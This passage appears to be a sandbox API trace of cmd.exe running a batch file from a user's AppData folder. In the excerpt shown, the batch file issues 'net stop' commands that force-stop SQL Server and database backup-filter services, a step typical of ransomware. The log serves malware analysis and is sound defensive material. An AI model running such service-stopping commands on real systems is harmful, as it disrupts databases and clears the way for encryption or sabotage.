/y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 42 [0218.543] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.543] GetFileType (hFile=0x74) returned 0x1 [0218.543] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.543] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1830 [0218.543] GetProcessHeap () returned 0x3e0000 [0218.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0218.543] GetProcessHeap () returned 0x3e0000 [0218.543] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0218.547] _tell (_FileHandle=3) returned 6192 [0218.547] _close (_FileHandle=3) returned 0 [0218.547] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0218.547] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0218.547] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0218.547] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0218.547] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0218.547] _wcsicmp (_String1="net", _String2="CD") returned 11 [0218.547] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0218.547] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0218.547] _wcsicmp (_String1="net", _String2="REN") returned -4 [0218.547] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0218.547] _wcsicmp (_String1="net", _String2="SET") returned -5 [0218.547] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0218.547] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0218.547] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0218.547] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0218.547] _wcsicmp (_String1="net", _String2="MD") returned 1 [0218.547] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0218.547] _wcsicmp (_String1="net", _String2="RD") returned -4 [0218.547] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0218.547] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0218.547] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0218.547] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0218.547] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0218.547] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0218.547] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0218.547] _wcsicmp (_String1="net", _String2="VER") returned -8 [0218.547] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0218.547] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0218.547] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0218.547] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0218.547] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0218.548] _wcsicmp (_String1="net", _String2="START") returned -5 [0218.548] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0218.548] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0218.548] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0218.548] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0218.548] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0218.548] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0218.548] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0218.548] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0218.548] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0218.548] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0218.548] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0218.548] SetErrorMode (uMode=0x0) returned 0x1 [0218.548] GetProcessHeap () returned 0x3e0000 [0218.548] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0218.548] GetProcessHeap () returned 0x3e0000 [0218.548] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0218.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.549] GetProcessHeap () returned 0x3e0000 [0218.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0218.549] GetProcessHeap () returned 0x3e0000 [0218.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0218.549] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0218.549] GetProcessHeap () returned 0x3e0000 [0218.549] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0218.549] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.549] GetProcessHeap () returned 0x3e0000 [0218.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0218.550] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0218.550] GetProcessHeap () returned 0x3e0000 [0218.550] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0218.550] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.551] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.551] GetLastError () returned 0x2 [0218.551] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.551] GetLastError () returned 0x2 [0218.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.552] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.552] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.552] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.553] GetLastError () returned 0x2 [0218.553] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.553] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.553] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.554] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0218.554] SetErrorMode (uMode=0x0) returned 0x1 [0218.554] GetProcessHeap () returned 0x3e0000 [0218.554] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0218.554] GetProcessHeap () returned 0x3e0000 [0218.554] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0218.554] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.555] GetProcessHeap () returned 0x3e0000 [0218.555] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0218.555] GetProcessHeap () returned 0x3e0000 [0218.555] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0218.555] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0218.555] GetProcessHeap () returned 0x3e0000 [0218.555] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0218.555] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.555] GetProcessHeap () returned 0x3e0000 [0218.555] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0218.555] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0218.555] GetProcessHeap () returned 0x3e0000 [0218.556] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0218.556] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.556] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.556] GetLastError () returned 0x2 [0218.557] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.557] GetLastError () returned 0x2 [0218.557] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0218.558] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.558] GetLastError () returned 0x2 [0218.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0218.559] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.559] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.559] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0218.559] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0218.560] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0218.560] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.560] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8d8, dwThreadId=0x890)) returned 1 [0218.564] CloseHandle (hObject=0x74) returned 1 [0218.564] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.564] GetProcessHeap () returned 0x3e0000 [0218.564] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.564] GetEnvironmentStringsW () returned 0x3f8408* [0218.564] GetProcessHeap () returned 0x3e0000 [0218.564] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.564] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.564] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0218.718] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0218.718] CloseHandle (hObject=0x78) returned 1 [0218.718] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0218.718] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0218.718] GetProcessHeap () returned 0x3e0000 [0218.718] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.718] GetEnvironmentStringsW () returned 0x3f8408* [0218.718] GetProcessHeap () returned 0x3e0000 [0218.718] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.719] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.719] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.719] GetProcessHeap () returned 0x3e0000 [0218.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.719] GetEnvironmentStringsW () returned 0x3f8408* [0218.719] GetProcessHeap () returned 0x3e0000 [0218.719] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.719] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.719] GetProcessHeap () returned 0x3e0000 [0218.719] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0218.719] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0218.719] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.719] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0218.719] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.719] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0218.720] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.720] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0218.720] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.720] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0218.720] SetConsoleInputExeNameW () returned 0x1 [0218.720] GetConsoleOutputCP () returned 0x1b5 [0218.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0218.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0218.721] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0218.721] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.721] SetFilePointer (in: hFile=0x78, lDistanceToMove=6192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1830 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0218.721] GetProcessHeap () returned 0x3e0000 [0218.721] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0218.722] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.722] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1830 [0218.722] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x91, lpOverlapped=0x0) returned 1 [0218.722] SetFilePointer (in: hFile=0x78, lDistanceToMove=6216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1848 [0218.722] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$PROD /y\r\ner ServiceΓÇ¥ /y\r\ny\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 24 [0218.722] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.722] GetFileType (hFile=0x78) returned 0x1 [0218.722] _get_osfhandle (_FileHandle=3) returned 0x78 [0218.722] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1848 [0218.722] GetProcessHeap () returned 0x3e0000 [0218.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0218.722] GetProcessHeap () returned 0x3e0000 [0218.722] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0218.726] _tell (_FileHandle=3) returned 6216 [0218.726] _close (_FileHandle=3) returned 0 [0218.726] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0218.726] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0218.726] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0218.726] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0218.726] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0218.726] _wcsicmp (_String1="net", _String2="CD") returned 11 [0218.726] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0218.726] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0218.726] _wcsicmp (_String1="net", _String2="REN") returned -4 [0218.726] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0218.726] _wcsicmp (_String1="net", _String2="SET") returned -5 [0218.726] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0218.726] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0218.726] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0218.726] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0218.726] _wcsicmp (_String1="net", _String2="MD") returned 1 [0218.726] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0218.726] _wcsicmp (_String1="net", _String2="RD") returned -4 [0218.726] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0218.726] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0218.726] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0218.726] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0218.726] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0218.726] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0218.726] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0218.726] _wcsicmp (_String1="net", _String2="VER") returned -8 [0218.726] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0218.727] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0218.727] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0218.727] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0218.727] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0218.727] _wcsicmp (_String1="net", _String2="START") returned -5 [0218.727] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0218.727] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0218.727] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0218.727] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0218.727] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0218.727] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0218.727] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0218.727] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0218.727] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0218.727] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0218.727] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0218.727] SetErrorMode (uMode=0x0) returned 0x1 [0218.727] GetProcessHeap () returned 0x3e0000 [0218.727] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0218.727] GetProcessHeap () returned 0x3e0000 [0218.727] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0218.728] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.728] GetProcessHeap () returned 0x3e0000 [0218.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0218.728] GetProcessHeap () returned 0x3e0000 [0218.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0218.728] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0218.728] GetProcessHeap () returned 0x3e0000 [0218.728] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0218.728] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.728] GetProcessHeap () returned 0x3e0000 [0218.728] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0218.729] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0218.729] GetProcessHeap () returned 0x3e0000 [0218.729] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0218.729] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.730] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.730] GetLastError () returned 0x2 [0218.731] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.731] GetLastError () returned 0x2 [0218.731] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.732] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.732] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.732] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.732] GetLastError () returned 0x2 [0218.733] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.733] FindClose (in: hFindFile=0x3f8278 | out: 